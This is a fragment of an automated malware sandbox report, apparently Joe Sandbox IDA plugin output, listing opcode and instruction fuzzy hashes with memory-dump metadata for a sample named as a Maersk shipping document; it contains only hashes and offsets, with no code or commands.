                                                    • Opcode Fuzzy Hash: afc0cfa68ae391390003ab5cc770bda80652b482e32006e17c5e7a193abded47
                                                    • Instruction Fuzzy Hash: F1019E715001099FC726DF29D448F2AFBF9EB85718F28826EE1058B664DB70EE46CF90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                    • Instruction ID: d748d795739755056bc5b29609cd2e5de92c95277ec1fa7a028b3651a61eced3
                                                    • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                    • Instruction Fuzzy Hash: 0A11E9712016C59FE7339B1CDD44B65BB94BB50B48F1904E4DF41C7682F738C981C250
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                    • Instruction ID: 66fbd43399efcb0971c323fc8a80566ef347a86d612c4cc47257414809355bc6
                                                    • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                    • Instruction Fuzzy Hash: 4C01D232600125AFEB239F58C844FAABBA9EB84754F158024EE05DB260E771DE80C794
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                    • Instruction ID: e9ae5806e92660c0e8d3dae7679b1c6d26ee0eed2ea5e80e8367e46a2516e4fc
                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                    • Instruction Fuzzy Hash: 4001C47150A7219BCF218F19A840A66BBF5EB9976070085ADF9958B681D731D404CB60
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eea32dac662deb38078b566828fa9465187c0f6069b5c17c7706c9d514096f04
                                                    • Instruction ID: b24e208d69654014757b73576e6501343212369fe3e2e313b9fe816804042f7c
                                                    • Opcode Fuzzy Hash: eea32dac662deb38078b566828fa9465187c0f6069b5c17c7706c9d514096f04
                                                    • Instruction Fuzzy Hash: 1101C072541601ABC322DF1C9844F52BBA8EB91774B264265E9A8DB1E6E730EA01CBD0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f83345de4b6a5720d5ca1c586453758a7f5df7ceaae5971c6c24999ea0ca2a5
                                                    • Instruction ID: d54f00ab53f0be932200f0bebd31c4bd7bc305e43204c18306d89b517afc685f
                                                    • Opcode Fuzzy Hash: 4f83345de4b6a5720d5ca1c586453758a7f5df7ceaae5971c6c24999ea0ca2a5
                                                    • Instruction Fuzzy Hash: 4B11CE32241201EFCB16AF09CC94F46BBB8FF58B84F200064FD058B655C235EE00CA90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef2d17eebf466cdb789e3d40cbbd02b50d903ddf22b2979802567477ea02f727
                                                    • Instruction ID: 40f51aa61a998fa7d4dcbc4763f9cb424d5ff1292b6488da7f53d7d9a93cfdaa
                                                    • Opcode Fuzzy Hash: ef2d17eebf466cdb789e3d40cbbd02b50d903ddf22b2979802567477ea02f727
                                                    • Instruction Fuzzy Hash: AF11A071901218ABDF25EB64CC4AFE8B3B8BF48710F5041D4B314A60E0E7709E81CF84
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34d654cd3c9f1eab32791a6be6bc1823040b2f955e35cdbbd408bbe7a4d52b8a
                                                    • Instruction ID: ba2e0d351efe4c0a45b89cd8b99cf5f50459be1fad9f85d41ee435bc33b9350d
                                                    • Opcode Fuzzy Hash: 34d654cd3c9f1eab32791a6be6bc1823040b2f955e35cdbbd408bbe7a4d52b8a
                                                    • Instruction Fuzzy Hash: FB111B7290001DABCB12DB94CC84DDFB7BCEF48354F044166E906E7211EA34AA55CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                    • Instruction ID: 6ffbd38436536c96a569adc83c4aa23a0e23423a2c71e912e57d069905390b34
                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                    • Instruction Fuzzy Hash: 2B01F1332001108BEF218A6DD880B93F76BBFC4700F9546A9EE018F24BEA71C881C3A0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dfb25c93a28be97d8a1466b02ff5bee9fdcc05769142836ecb60a8d896cf763
                                                    • Instruction ID: cc6401d5d234f9c9e9b7042c90b577b6af8641a0869853aac7db9a8625fab750
                                                    • Opcode Fuzzy Hash: 3dfb25c93a28be97d8a1466b02ff5bee9fdcc05769142836ecb60a8d896cf763
                                                    • Instruction Fuzzy Hash: F3118272644145AFD711CF5CD440BA5B7B5BB9A314F1C8169F844CB355E731EA41CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff32cdf9b16454df6db3bf65875e550a5e656ca9229f3d7513c61a0249034d14
                                                    • Instruction ID: 109e076d0ef34df29dfae76506c700a9532263efe718a9c650d945243edcedc1
                                                    • Opcode Fuzzy Hash: ff32cdf9b16454df6db3bf65875e550a5e656ca9229f3d7513c61a0249034d14
                                                    • Instruction Fuzzy Hash: 07111CB1A00219AFCB00DF99D585AAEBBF4FF58350F10806AE905E7355D674EA418BA4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4335aed579438948e089a0afc326aad72fd5d434ab748b229e9ac06d3c71692
                                                    • Instruction ID: 691f6b282dec4a91d2f79433d6b47df04e67fc5d27044bf3a8b2149b49d6ef4d
                                                    • Opcode Fuzzy Hash: b4335aed579438948e089a0afc326aad72fd5d434ab748b229e9ac06d3c71692
                                                    • Instruction Fuzzy Hash: 1E01F5311411159FCB32EE258484E6ABBA9FF61750B14446AE6458B241CF34AD41CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                    • Instruction ID: 3bbe10a6790d95adca1320efab94d9d31ae2471d6cb79447ffba31bcdea67490
                                                    • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                    • Instruction Fuzzy Hash: 2801F5321007459FEF3396AED804EA7F7E9FFC5210F14481DA6568B640EA70E445C760
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74dcbf8307f5a05fb58037c5d5f54d9445a579ca060d352666586e6070bc0c90
                                                    • Instruction ID: edf6c09b676dfeadf48571259d0bd4089893377b969a0ce381ca8fc3abb2ea0d
                                                    • Opcode Fuzzy Hash: 74dcbf8307f5a05fb58037c5d5f54d9445a579ca060d352666586e6070bc0c90
                                                    • Instruction Fuzzy Hash: CB116D75A0124DAFCB05EFA4C858FAEBBF9EB48740F004099E902D7254E635EE51CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6441d039d8e45f283782b50d948a5b89b4d0e2ceb92c0996c1bf8c14808eb94
                                                    • Instruction ID: 60ea626863b9f816ddcd9b638f678e4fa9d5a8d8dd2a192956340300aca9cb7a
                                                    • Opcode Fuzzy Hash: b6441d039d8e45f283782b50d948a5b89b4d0e2ceb92c0996c1bf8c14808eb94
                                                    • Instruction Fuzzy Hash: 6001B172201901BBC311AB69CDC8E93FBACFF557A47100529B205C7555DB24EC01C6A0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4efe7215fe32dbd60fe7318c8f83fa1d48dae48082d1290b18b840b50371362
                                                    • Instruction ID: bc99a73d49842577504a0e1f88eba721469f3e6d6aa8bec9b04ab970ac10a1f5
                                                    • Opcode Fuzzy Hash: c4efe7215fe32dbd60fe7318c8f83fa1d48dae48082d1290b18b840b50371362
                                                    • Instruction Fuzzy Hash: 8001D832214206ABC320DF6DD888DA6FBE8EF98764F254529E959C7180E7309B12C7D1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                    • Instruction ID: c1d0ecdc70d3e13b6c5d3ac21254595bc7c27affb6fc21dcfd8266dacbeac0a1
                                                    • Opcode Fuzzy Hash: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                    • Instruction Fuzzy Hash: 6E115B71A0021DABDB15EF68C884EAEBBB5FB48344F004099F901D7354DB34EA51CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                    • Instruction ID: 456ce743c5963510943ef09efe4cfc9ba414342650897cd57c77e96a77438be2
                                                    • Opcode Fuzzy Hash: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                    • Instruction Fuzzy Hash: 371179B16083089FC700DF69D445A9BBBE4EF98710F00495AF998D7394E630E910CB92
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                    • Instruction ID: 778652bf19f93ab913ad58114e2ab6cbbe6a9ed10f292e22eeda1e2c0eb54283
                                                    • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                    • Instruction Fuzzy Hash: C701D4322046059FD721AA6DD844F96FBEAFBC6710F044819E642CB694DAB0F980CB94
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2a39ab7a669c0a62626e99766ee401834df06852eb5ebbf4e25e7a9ddddd3f74
                                                    • Instruction ID: eb2dafd24bea922aad8f62db26dc2c0e314bee3d80d9dadd0c27b9aedc98bf52
                                                    • Opcode Fuzzy Hash: 2a39ab7a669c0a62626e99766ee401834df06852eb5ebbf4e25e7a9ddddd3f74
                                                    • Instruction Fuzzy Hash: E101F271240709AFD3315F19D884F46BAA8EF54B50F14082EB706DF394DBB5AA408B64
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                    • Instruction ID: e45be4a676e48b75aece5dd80c8da7d1c99d141597bbebbf6988d41010120109
                                                    • Opcode Fuzzy Hash: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                    • Instruction Fuzzy Hash: A1F0F432A42A10B7C732DB5ACC84F47FAAAEBC4B90F104168E60597640DA30ED01DAA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                    • Instruction ID: 6a612bfd5dc0a874a068c723d09c5be26afb461f7add8819685449071895558c
                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                    • Instruction Fuzzy Hash: 7FF0C2B3600611ABD325CF4DDC40E57FBEADBD5B80F04812CA609CB220EA31ED04CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                    • Instruction ID: 14d911da17c942933627f544b3e712701d0f0fad72acca80d0e3963ecad6b01d
                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                    • Instruction Fuzzy Hash: A0F0FC332046639BDF3316596844B6BE9958FD5A64F190035E30D9B244CA608D0956D2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcd5e383b7656fc209009ee393b574c0f165574a3117f133d19e2529bdabe881
                                                    • Instruction ID: 46b55b76c024957dbd74d0417d10cf22282063f32644dc8fb1b7e9c3da5962eb
                                                    • Opcode Fuzzy Hash: dcd5e383b7656fc209009ee393b574c0f165574a3117f133d19e2529bdabe881
                                                    • Instruction Fuzzy Hash: 7F017C71A10209AFDB00DFA9E844AAEBBF8FF58304F10406AF900E7350D634DA00DBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89f4bc115a23a1809fe1a173a861d71f23dc2c47d48d9572355f7d0159ac6503
                                                    • Instruction ID: 7f54b89343ada672096a8ddad1c9f638ee116ef957d1742527bafdc474f8cdbb
                                                    • Opcode Fuzzy Hash: 89f4bc115a23a1809fe1a173a861d71f23dc2c47d48d9572355f7d0159ac6503
                                                    • Instruction Fuzzy Hash: F5012C71A00209AFDB04DFA9E445AAEBBF8EF58704F50406AE915E7390D674DA01CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd6165db3ecbedce4bd12c1b6b9434f6846a45c7912a5c5b49f3d81f43e754f9
                                                    • Instruction ID: 2c123fb36c071c29ece919653f1725c4ee5c00735849ec74028a2e550bb8cb86
                                                    • Opcode Fuzzy Hash: fd6165db3ecbedce4bd12c1b6b9434f6846a45c7912a5c5b49f3d81f43e754f9
                                                    • Instruction Fuzzy Hash: 49017C71A1020AAFDB04DFA9D485AAEB7F8EF58304F14406AF904E7350D674EA008BA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                    • Instruction ID: a46c41a14af5b50bbe402efdf94818c698ff9c256db342a9256499ba7be68e51
                                                    • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                    • Instruction Fuzzy Hash: 5201F9326406899BD323971DCC49F59FBACEF82754F0944A9FA04DB691DB74CA40C211
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                    • Instruction ID: 2f79e4e4e7461e6e5d80897eed723f8d66b270eb29a83c1c0961e6103723f6ce
                                                    • Opcode Fuzzy Hash: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                    • Instruction Fuzzy Hash: BC018F71A10249AFDB00DFA9D845AEEBBF8BF58314F14005AE505E7280E734EA01CB94
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                    • Instruction ID: 6afa0901f4cf4c36c1126d5d1e64ca5639833494c4d1788abb7e1bfdc6bfff82
                                                    • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                    • Instruction Fuzzy Hash: 5DF0127210001DBFEF029F94DD80DEF7B7DFB55798B104129FA1192160D635DE21A7A0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                    • Instruction ID: 1cf266568112b5c696127f77aeb16c22e1879d5c51c459c2c7eda7468499cca5
                                                    • Opcode Fuzzy Hash: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                    • Instruction Fuzzy Hash: 9C018936100119ABCF129E84D940EDA7F66FF4C754F058106FE18A6620C336DAB0EF81
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                    • Instruction ID: 6c43804fc8bf9bf494a4c08e88f308b692cadb5de56a1ed1831b0875df8ac413
                                                    • Opcode Fuzzy Hash: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                    • Instruction Fuzzy Hash: 07F024F22882415BFF169619AC05B32F69AE7C0650F65807AEB058B2D1EA70DC0583A8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                    • Instruction ID: 4a2e2e4f72588d2f76a78f9c9320bf034a240cd84f3bfe4d022c9ac607b15a83
                                                    • Opcode Fuzzy Hash: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                    • Instruction Fuzzy Hash: 2501A4712006859BE3239B6CCD48F65B7E8BB40B04F980594FA02CB6DAD768D6C18610
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction ID: 02ba3e093b89021263a7f2f5cfc39d1cbbb592f76194347b4136160494e29f6c
                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction Fuzzy Hash: 38F0AE37341E1747E776AA2D9414F2FE695AF90F51F05052CA556CB640DF60DD01C790
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                    • Instruction ID: 6bc764c4d7d44ffd304cfff4cb6852ca3ab287a8a6c9766d5646139e6e34d87b
                                                    • Opcode Fuzzy Hash: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                    • Instruction Fuzzy Hash: 06F0A4706053049FC310EF28C445E2EB7E4FF58714F40465AB894DB394E634EA00C756
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                    • Instruction ID: bcba071f42b0064f1205c7a29a63c533f9fc3e14841c31f1a46402d8c438929d
                                                    • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                    • Instruction Fuzzy Hash: EAF054337115219BD3329A4ECCC0F16B768AFD5B60F190465EA54DB264C7A0ED8187D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
